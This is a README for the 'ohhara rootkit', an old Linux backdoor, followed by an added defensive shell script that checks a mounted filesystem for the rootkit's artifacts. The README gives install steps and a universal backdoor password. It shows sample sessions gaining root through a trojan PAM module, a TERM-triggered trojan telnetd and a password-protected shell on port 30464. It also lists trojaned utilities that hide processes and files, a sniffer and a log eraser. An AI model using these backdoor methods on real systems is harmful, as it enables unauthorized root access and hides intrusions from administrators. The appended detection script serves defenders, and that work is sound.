ohhara rootkit

1. What is ohhara rootkit?

Ohhara rootkit is a backdoor for linux ( it's tested only in the x86 redhat
linux 6.0 ). This program is for demonstrative use only. USE IT AT YOUR OWN
RISK!

2. How to install ohhara rootkit?

( edit
  bin/glibc2.1/var/lock/subsys/...datafile.../...ps...
  bin/glibc2.1/var/lock/subsys/...datafile.../...file...
  bin/glibc2.1/var/lock/subsys/...datafile.../...port...
  bin/glibc2.1/var/lock/subsys/...datafile.../...net... )
cd bin/glibc2.1
./install-ohhara-rootkit
vi /etc/inetd.conf ( change in.telnetd to telnetd )
killall -HUP inetd

3. How to uninstall ohhara rootkit?

cd bin/glibc2.1
./uninstall-ohhara-rootkit
vi /etc/inetd.conf ( change telnetd to in.telnetd )
killall -HUP inetd
vi /etc/rc.d/rc.local ( remove in.inetd and in.smbd startup code )

4. How to use ohhara rootkit?

/lib/security/pam_pwdb.so
    Trojan pam. Anyone can login to any account with password 'gkfkqo79'.
----------
$ telnet hacked.com
Trying xxx.xxx.xxx.xxx...
Connected to hacked.com
Escape character is '^]'.
login: bin
Password: ( gkfkqo79 )
bash$ whoami
bin
bash$ su root
Password: ( gkfkqo79 )
bash# whoami
root
bash#
----------

/bin/chgrp
/bin/chmod
/bin/chown
/bin/cp
/bin/ln
/bin/ls
/bin/mkdir
/bin/mknod
/bin/touch
/bin/ps
/bin/netstat
/bin/rm
/bin/rmdir
/bin/mv
/usr/bin/dir
/usr/bin/du
/usr/bin/mkfifo
/usr/bin/vdir
/usr/bin/oldps
/usr/bin/top
/usr/bin/find
    Hide process, file, port, and network. The hidden file list is in
    /var/lock/subsys/...datafile.../

/usr/sbin/telnetd
    Trojan telnetd. Anyone can get root with the command below.
----------
$ TERM=gkfkqo79 ; export TERM ; telnet hacked.com
Trying xxx.xxx.xxx.xxx...
Connected to hacked.com
Escape character is '^]'.
bash# whoami
root
bash#
----------

/usr/sbin/in.smbd
    Linux sniffer

/var/lock/subsys/...datafile.../...datafile.../in.smbd.log
    Linux sniffer logfile

/usr/sbin/in.inetd
    Shell spawn daemon on tcp port 30464 ( password is 'gkfkqo79' )
----------
$ telnet hacked.com 30464
Trying xxx.xxx.xxx.xxx...
Connected to hacked.com
Escape character is '^]'.
gkfkqo79
whoami;
root
: command not found
----------

/usr/sbin/fixdate
    Log eraser ( zap2 )

/var/lock/subsys/...datafile.../...ps...
    Hidden process list

/var/lock/subsys/...datafile.../...file...
    Hidden file list

/var/lock/subsys/...datafile.../...port...
    Hidden port list

/var/lock/subsys/...datafile.../...net...
    Hidden network list

----------------------------------------------------------------------------
Taeho Oh ( ohhara@4dl.com, ohhara@postech.edu )       http://postech.edu/~ohhara
4DL ( 4th Dimension Laboratory )                      http://4dl.com
Postech ( Pohang University of Science and Technology ) http://postech.edu
----------------------------------------------------------------------------
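Added example, not part of the ohhara rootkit distribution: a POSIX shell check for the on-disk artifacts section 4 lists (the hidden-list directory, the dropped in.inetd / in.smbd / fixdate binaries, the inetd.conf rewrite from section 2 and the rc.local startup lines from section 3). It is meant to be run from a clean rescue system with the suspect root filesystem mounted under a prefix, because on the live host ls, find, ps and netstat are the replaced binaries; the function name, the prefix argument and the sample tree it builds are this editor's assumptions and constructions.

```shell
# Offline indicator check for the ohhara rootkit artifacts listed in this README.
# Run it from a clean rescue system with the suspect root filesystem mounted
# (read-only) under the prefix given as $1; on the live host ls, find, ps and
# netstat are themselves the trojaned binaries, so their output cannot be trusted.
ohhara_indicators() {
    root="${1:-/}"
    hits=0
    # Directory holding the hidden process/file/port/network lists.
    if [ -d "$root/var/lock/subsys/...datafile..." ]; then
        echo "hidden-list directory present: $root/var/lock/subsys/...datafile..."
        hits=$((hits + 1))
    fi
    # Daemons and tools the installer drops: shell spawner, sniffer, log eraser.
    for f in usr/sbin/in.inetd usr/sbin/in.smbd usr/sbin/fixdate; do
        if [ -e "$root/$f" ]; then
            echo "unexpected binary: $root/$f"
            hits=$((hits + 1))
        fi
    done
    # Install step rewrites in.telnetd to the trojan telnetd in inetd.conf;
    # a legitimate entry ends in "in.telnetd", whose "telnetd" follows a dot.
    if [ -f "$root/etc/inetd.conf" ] &&
       grep -Eq '^[^#].*[[:space:]/]telnetd' "$root/etc/inetd.conf"; then
        echo "inetd.conf runs bare telnetd instead of in.telnetd"
        hits=$((hits + 1))
    fi
    # Uninstall step says rc.local carries the in.inetd / in.smbd startup lines.
    if [ -f "$root/etc/rc.d/rc.local" ] &&
       grep -Eq '^[^#].*(in\.inetd|in\.smbd)' "$root/etc/rc.d/rc.local"; then
        echo "rc.local starts in.inetd or in.smbd"
        hits=$((hits + 1))
    fi
    return "$hits"   # 0 when nothing matched, else the number of indicators
}

# Constructed sample tree (not a real host) so the check can be exercised offline.
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/var/lock/subsys/...datafile..." "$t/usr/sbin" "$t/etc/rc.d"
    : > "$t/usr/sbin/in.inetd"
    printf 'telnet stream tcp nowait root /usr/sbin/tcpd telnetd\n' > "$t/etc/inetd.conf"
    printf '#!/bin/sh\n/usr/sbin/in.smbd &\n' > "$t/etc/rc.d/rc.local"
    echo "$t"
}

sample=$(make_sample_tree)
ohhara_indicators "$sample" || echo "indicators found: $?"
rm -rf "$sample"
```

A clean tree yields no output and exit status 0; the constructed tree above reports four indicators.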